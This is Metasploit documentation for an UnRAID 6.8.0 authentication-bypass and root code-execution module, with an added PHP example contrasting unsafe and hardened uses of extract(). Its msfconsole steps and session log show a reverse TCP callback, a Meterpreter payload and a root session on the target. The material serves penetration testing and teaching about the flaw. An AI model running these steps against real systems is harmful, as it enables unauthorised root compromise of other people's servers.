metasploit-gs/documentation/modules/exploit/linux/http/unraid_auth_bypass_exec.md
2022-11-23 13:26:19 -06:00

Vulnerable Application

This module has been tested on UnRAID 6.8.0 without any configuration except setting a root password. Only UnRAID 6.8.0 is affected.

Description

This module exploits an authentication bypass vulnerability caused by an insecure whitelisting mechanism in auth_request.php and then performs remote code execution as root by abusing the extract function used in the template.php file.
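
An added illustration of the extract() bug class named above, not code from UnRAID or from the Metasploit module; the function names, template string and sample request are hypothetical. It contrasts calling extract() on request data with two safer forms, a prefixed extract and an explicit allowlist.

```php
<?php
// Hypothetical template renderer; names are illustrative, not UnRAID's code.

// Weak: extract() defaults to EXTR_OVERWRITE, so request keys replace
// variables already in scope, including the trusted $template.
function render_weak(array $request): string {
    $template = 'Hello, {name}';   // trusted value set by the application
    $name = 'guest';
    extract($request);             // caller-controlled keys overwrite both
    return str_replace('{name}', $name, $template);
}

// Stopgap: EXTR_PREFIX_ALL puts every imported key under a prefix, so
// request data can no longer collide with the function's own variables.
function render_prefixed(array $request): string {
    $template = 'Hello, {name}';
    extract($request, EXTR_PREFIX_ALL, 'req');   // creates $req_name, $req_template
    $name = (isset($req_name) && is_string($req_name)) ? $req_name : 'guest';
    return str_replace('{name}', htmlspecialchars($name, ENT_QUOTES), $template);
}

// Hardened: no extract() at all. Copy only expected keys and validate each.
function render_hardened(array $request): string {
    $template = 'Hello, {name}';
    $allowed = ['name' => '/^[A-Za-z0-9 _-]{1,32}$/'];
    $vars = ['name' => 'guest'];
    foreach ($allowed as $key => $pattern) {
        if (isset($request[$key]) && is_string($request[$key])
            && preg_match($pattern, $request[$key]) === 1) {
            $vars[$key] = $request[$key];
        }
    }
    return str_replace('{name}', htmlspecialchars($vars['name'], ENT_QUOTES), $template);
}

// Constructed sample input standing in for request parameters.
$request = ['name' => 'alice', 'template' => 'OVERRIDDEN by request: {name}'];

echo render_weak($request), PHP_EOL;
echo render_prefixed($request), PHP_EOL;
echo render_hardened($request), PHP_EOL;
```

Only the first call lets the request replace the application's template; the other two keep it fixed and treat the request value as data.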

Testing Environment

Download links are provided for reference only and are not maintained by the project. Use at your own risk! Set up UnRAID 6.8.0 according to the UnRAID Getting Started guide.

Verification Steps

  1. Set up UnRAID 6.8.0
  2. Start msfconsole
  3. use exploit/linux/http/unraid_auth_bypass_exec
  4. set RHOST [UNRAID]
  5. check
  6. run
  7. You should get a new root session

Options

TARGETURI : The URI of the Unraid application

Scenarios

msf5 > use exploit/linux/http/unraid_auth_bypass_exec.rb
msf5 exploit(linux/http/unraid_auth_bypass_exec) > set RHOSTS 10.10.0.173
RHOSTS => 10.10.0.173
msf5 exploit(linux/http/unraid_auth_bypass_exec) > check
[*] 10.10.0.173:80 - The target appears to be vulnerable.
msf5 exploit(linux/http/unraid_auth_bypass_exec) > run

[*] Started reverse TCP handler on 10.10.0.161:4444 
[*] Sending stage (38288 bytes) to 10.10.0.173
[*] Meterpreter session 1 opened (10.10.0.161:4444 -> 10.10.0.173:46894) at 2020-03-20 15:26:40 +0100
[+] Request timed out, OK if running a non-forking/blocking payload...

meterpreter > getuid
Server username: root (0)